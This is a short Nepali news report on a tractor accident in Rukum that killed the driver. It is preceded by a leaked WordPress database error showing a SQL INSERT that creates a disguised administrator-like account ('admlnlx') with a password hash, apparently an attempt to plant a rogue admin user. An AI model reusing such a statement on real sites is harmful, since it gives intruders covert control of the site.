WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKngF4pl0UChr.LH6PPiYqfPxwXAeJ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 19:29:14', '', 'admlnlx', 'admlnlx')
रुकुम, माघ २९ –
रुकुममा आज बिहान ट्र्याक्टर दुर्घटना हुँदा एक जनाको मृत्यु भएको छ ।
मृत्यु हुनेमा रा १ त १०८२ नं को ट्र्याक्टरका चालक दाङ धनौली गाविसका ४४ वर्षीय सुकराम चौधरी रहेको प्रहरीेले जनाएको छ । मुसिकोट नगरपालिका–५ सोलवाङबाट सिमेन्ट लिएर राडी बजार जाँदै गरेको ट्र्याक्टर मग्मा–५ बास्तालामा दुर्घटनाग्रस्त भएको प्रहरी निरीक्षक थमनबहादुर रजालीले जानकारी दिनुभयो ।
ट्र्याक्टर सडकबाट एक सय मिटर तल खसेको र ७० बोरा सिमेन्ट पूर्णरुपमा क्षति भएको उहाँले बताउनुभयो । चौधरीको शव परीक्षणका लागि जिल्ला अस्पताल ल्याइएको छ । – रासस